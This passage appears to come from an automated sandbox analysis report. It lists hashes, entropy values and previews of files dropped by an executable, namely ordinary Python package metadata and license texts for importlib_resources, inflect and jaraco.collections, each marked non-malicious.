                                                                                                                                                                                                                              Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3944
                                                                                                                                                                                                                              Entropy (8bit):5.015824473130961
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DHxQuiTaCP1nTGDbHRbnzQWHaiQq+fT5lWp8sSwTW:2PP9GDbHRbnp+rapPSwTW
                                                                                                                                                                                                                              MD5:C3EB48CD13B50DDED7CD524E1E9DD4CE
                                                                                                                                                                                                                              SHA1:7C9B0B50D0E667825DAB09902AD8376A5F2945B6
                                                                                                                                                                                                                              SHA-256:83878CD8BB8BD0E89971454D0F4AB00C9529136F603AFB4EDC148F5D36CEF459
                                                                                                                                                                                                                              SHA-512:056EBC250B7E82F91B5C5E96B1293F24D5E917E06846A9716A4D05B47C30FEB3781E439C77876CF7D8620BEBAA4A253039CA8DF122283DE304992E340F4DE8BF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: importlib_resources.Version: 6.4.0.Summary: Read resources from Python packages.Home-page: https://github.com/python/importlib_resources.Author: Barry Warsaw.Author-email: barry@python.org.Project-URL: Documentation, https://importlib-resources.readthedocs.io/.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: zipp >=3.1.0 ; python_version < "3.10".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; ext
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7620
                                                                                                                                                                                                                              Entropy (8bit):5.560551717923108
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:lX7qdX7ZgsP7JtILSVAn5V26+XuVYmBXx:lX7wX7ZBP7ELSVAni6+iBh
                                                                                                                                                                                                                              MD5:67F5E26385B6BDCF2236A005A2D2BA32
                                                                                                                                                                                                                              SHA1:3DCD8685638A90D121FD484138AFCAC9775E5D66
                                                                                                                                                                                                                              SHA-256:967DD56FEEA143F1D2C4E98AC1F937C055E61C9AA0425146D55F7AD7C82510FA
                                                                                                                                                                                                                              SHA-512:30B5812E930A00A476E570EBCC4611D54C911A8B1E4646949A887F551FC5ABDC933311A554B197C602F0DA7626DFE8877A3F267EFBC6D724E24A3E9B5FCC2E30
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:importlib_resources-6.4.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_resources-6.4.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_resources-6.4.0.dist-info/METADATA,sha256=g4eM2LuL0OiZcUVND0qwDJUpE29gOvtO3BSPXTbO9Fk,3944..importlib_resources-6.4.0.dist-info/RECORD,,..importlib_resources-6.4.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_resources-6.4.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..importlib_resources-6.4.0.dist-info/top_level.txt,sha256=fHIjHU1GZwAjvcydpmUnUrTnbvdiWjG4OEVZK8by0TQ,20..importlib_resources/__init__.py,sha256=uyp1kzYR6SawQBsqlyaXXfIxJx4Z2mM8MjmZn8qq2Gk,505..importlib_resources/__pycache__/__init__.cpython-312.pyc,,..importlib_resources/__pycache__/_adapters.cpython-312.pyc,,..importlib_resources/__pycache__/_common.cpython-312.pyc,,..importlib_resources/__pycache__/_itertools.cpython-312.pyc,,..importlib_resource
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20
                                                                                                                                                                                                                              Entropy (8bit):3.6841837197791887
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:JSe8AW6D:3fD
                                                                                                                                                                                                                              MD5:0613840F692BD9E064FEDD915DFD477A
                                                                                                                                                                                                                              SHA1:64DF38B36F541BA1714C15FCA1A9CA8C94EF2DAA
                                                                                                                                                                                                                              SHA-256:7C72231D4D46670023BDCC9DA6652752B4E76EF7625A31B83845592BC6F2D134
                                                                                                                                                                                                                              SHA-512:78AA888C24B3468C94FCB8EB882561D4B6F19A0537A4CFDDDFF94ED8A4BAFE8DF0C2B620E70B57A61E8BA3F877856DB9ADA548DFCA8CAE86D4C3C525A4E9B7EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:importlib_resources.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21079
                                                                                                                                                                                                                              Entropy (8bit):5.103530371859935
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:12Vpnu38/2K9tjUaNtT/yTCtYTnWDdg3GaXb51KLVgWTVPeEGsuPrAESM:12Vpnu38JZtT/yIdg3D51KLV7RPeEGs+
                                                                                                                                                                                                                              MD5:1A287FAF08B125BC7C932AAD05E7DAEE
                                                                                                                                                                                                                              SHA1:C37042ADC0D1270485F4B8B5B9E085A274DC035B
                                                                                                                                                                                                                              SHA-256:66030D634580651B3E53CC19895D9231F8D22AA06B327817C8332CFC20303308
                                                                                                                                                                                                                              SHA-512:D0BB0AD27A17007DF7D3281FB2F46EFB048B69532D082AB1D431E0BA28E592D897687708B4EC972F4BC21EDA29DDDDC9EF44BB950DFC4FFB03EA75CDA4DE414C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: inflect.Version: 7.3.1.Summary: Correctly generate plurals, singular nouns, ordinals, indefinite articles.Author-email: Paul Dyson <pwdyson@yahoo.com>.Maintainer-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/jaraco/inflect.Keywords: plural,inflect,participle.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Natural Language :: English.Classifier: Operating System :: OS Independent.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: Text Processing :: Linguistic.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: more-itertools >=8.5.0.Requires-Dist: typeguard >=4.0.1.Requires-Dist: typing-extensions ; python_version < "3.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):943
                                                                                                                                                                                                                              Entropy (8bit):5.828988691860191
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:IVn/2zDPvbqfuIpBntmuIcjlM+sVGXdbkDcnJopDvDK16bZWJV:unuXPzUuIpRtmuZjl9sVQgcnJo9bK16E
                                                                                                                                                                                                                              MD5:C837BB3258448B7FCC6B77559C7F17B6
                                                                                                                                                                                                                              SHA1:B15701449CD64A13756A70AD3704E26DB1FF416B
                                                                                                                                                                                                                              SHA-256:5D7834AC1BA2612C6801050FDE57A7B98B0F36ACF88C3C2D4F376FD8911B3091
                                                                                                                                                                                                                              SHA-512:2333CD86502C51607414390ECF43BD6D62E863D3DFB0501DAD3A8B45F5F4DFA81F910917183FC4F4A0DEEC82C8F8B3CF8D5B0A2C136DEB164226BABE68B74A33
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:inflect-7.3.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..inflect-7.3.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..inflect-7.3.1.dist-info/METADATA,sha256=ZgMNY0WAZRs-U8wZiV2SMfjSKqBrMngXyDMs_CAwMwg,21079..inflect-7.3.1.dist-info/RECORD,,..inflect-7.3.1.dist-info/WHEEL,sha256=y4mX-SOX4fYIkonsAGA5N0Oy-8_gI4FXw5HNI1xqvWg,91..inflect-7.3.1.dist-info/top_level.txt,sha256=m52ujdp10CqT6jh1XQxZT6kEntcnv-7Tl7UiGNTzWZA,8..inflect/__init__.py,sha256=Jxy1HJXZiZ85kHeLAhkmvz6EMTdFqBe-duvt34R6IOc,103796..inflect/__pycache__/__init__.cpython-312.pyc,,..inflect/compat/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..inflect/compat/__pycache__/__init__.cpython-312.pyc,,..inflect/compat/__pycache__/py38.cpython-312.pyc,,..inflect/compat/py38.py,sha256=oObVfVnWX9_OpnOuEJn1mFbJxVhwyR5epbiTNXDDaso,160..inflect/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):91
                                                                                                                                                                                                                              Entropy (8bit):4.7098485981676825
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeXMRYFAVLKSgP+tPCCfA5S:RtC1VLKZWBBf
                                                                                                                                                                                                                              MD5:EB46A94D39AC40E2EEA4A32729E0C8C3
                                                                                                                                                                                                                              SHA1:E42EF49A7098269E1934932ECC3174B40967982A
                                                                                                                                                                                                                              SHA-256:CB8997F92397E1F6089289EC0060393743B2FBCFE0238157C391CD235C6ABD68
                                                                                                                                                                                                                              SHA-512:D89F0DA16AA37AAFAC0DE56A3DFBD72DC3C9DCC53C8E455094E7230DB21ABF95ED76EAC1848A4156DB422B9C10BE136201D871DCCB73AD38192E5536E41DBDFE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: setuptools (70.2.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8
                                                                                                                                                                                                                              Entropy (8bit):3.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:KDpJ:K9J
                                                                                                                                                                                                                              MD5:4571281D24750CBE7638EFE250E342AB
                                                                                                                                                                                                                              SHA1:61E8A0AD5796F1CA67EAB0D8108A6402483D499B
                                                                                                                                                                                                                              SHA-256:9B9DAE8DDA75D02A93EA38755D0C594FA9049ED727BFEED397B52218D4F35990
                                                                                                                                                                                                                              SHA-512:E7807002E53CC228D6EFB307E928C6737796B29E31D25A342ED407F556FFBF540494FE92C27B5C31043D2D7FF427C78A29C4FF5595BC11BB643003026642254E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:inflect.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3933
                                                                                                                                                                                                                              Entropy (8bit):4.993707893382395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:D0duaC9zmnEh2S8xI0+4np+A+fbl7inVgQJSwT2:qq9KnEh2zxI0+4npn+zlmn+QJSwT2
                                                                                                                                                                                                                              MD5:C9BA49C9B82CEFCCAC79CB5B76BCB1EE
                                                                                                                                                                                                                              SHA1:AC0DB25AEFD2679B4C3265E713D00F6155A94465
                                                                                                                                                                                                                              SHA-256:20C51A96236C0395F53B1F4C5D458E6A0721E51E16C1BFF733B7ABA76F5D06D8
                                                                                                                                                                                                                              SHA-512:563C3BEC6FB8D137357130BADCB63A229A18A781B05E2F006F4A42AF7C9052D23D266908DA2E62FF283C9BA7BAA9B6CB6FB32A1999CB07F63471CA43003A34C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: jaraco.collections.Version: 5.1.0.Summary: Collection objects similar to those in stdlib by jaraco.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/jaraco/jaraco.collections.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: jaraco.text.Provides-Extra: check.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'check'.Requires-Dist: pytest-ruff >=0.2.1 ; (sys_platform != "cygwin") and extra == 'check'.Provides-Extra: cover.Requires-Dist: pytest-cov ; extra == 'cover'.Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):873
                                                                                                                                                                                                                              Entropy (8bit):5.770829319764291
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:T9bn/2zDabvbqfunb1AO5bGYbEsJvbp1blKzmKmJaaX9WJV:T9bnuXabzUunb1AgbBb5Jvbp1blscWJV
                                                                                                                                                                                                                              MD5:0463062305AC30E7F3D6AB12DA825D90
                                                                                                                                                                                                                              SHA1:AC83602461BF535C78EB4CCC13AB103C12110D57
                                                                                                                                                                                                                              SHA-256:1E9B62BD70E4A5FA26E9594CBB80860FFECA3DEBFEE8773DAEFA774CD259CA06
                                                                                                                                                                                                                              SHA-512:8F617D9A2DA41BDC8591D9EA9F2DBE79D7C5816BA7A94D4044AFF2A0504C9738E83FFCAA350CEF20764D430C261C9DC17DBB5E4ABB7AE54C3BE8715C8AD6BB71
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.collections-5.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.collections-5.1.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.collections-5.1.0.dist-info/METADATA,sha256=IMUaliNsA5X1Ox9MXUWOagch5R4Wwb_3M7erp29dBtg,3933..jaraco.collections-5.1.0.dist-info/RECORD,,..jaraco.collections-5.1.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..jaraco.collections-5.1.0.dist-info/WHEEL,sha256=Mdi9PDNwEZptOjTlUcAth7XJDFtKrHYaQMPulZeBCiQ,91..jaraco.collections-5.1.0.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/collections/__init__.py,sha256=Pc1-SqjWm81ad1P0-GttpkwO_LWlnaY6gUq8gcKh2v0,26640..jaraco/collections/__pycache__/__init__.cpython-312.pyc,,..jaraco/collections/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):91
                                                                                                                                                                                                                              Entropy (8bit):4.696166043246402
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeXMRYFAWWHKRRP+tPCCfA5S:RtC1qjWBBf
                                                                                                                                                                                                                              MD5:6FBE8610D7E48CA32AE774804C4A0B19
                                                                                                                                                                                                                              SHA1:102D23C4ECB17ED83A6E43888B45FF2BBFE93E0B
                                                                                                                                                                                                                              SHA-256:31D8BD3C3370119A6D3A34E551C02D87B5C90C5B4AAC761A40C3EE9597810A24
                                                                                                                                                                                                                              SHA-512:78738099EC5B31FDEE5AE50F7840F17EFD526588835157CADF4249882462B1AF2E3BEDB77801A9FCB1D22A8FD41AA6A934B382F3E66309723D0E7F93C2F2868A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: setuptools (73.0.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                              Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                              MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                              SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                              SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                              SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
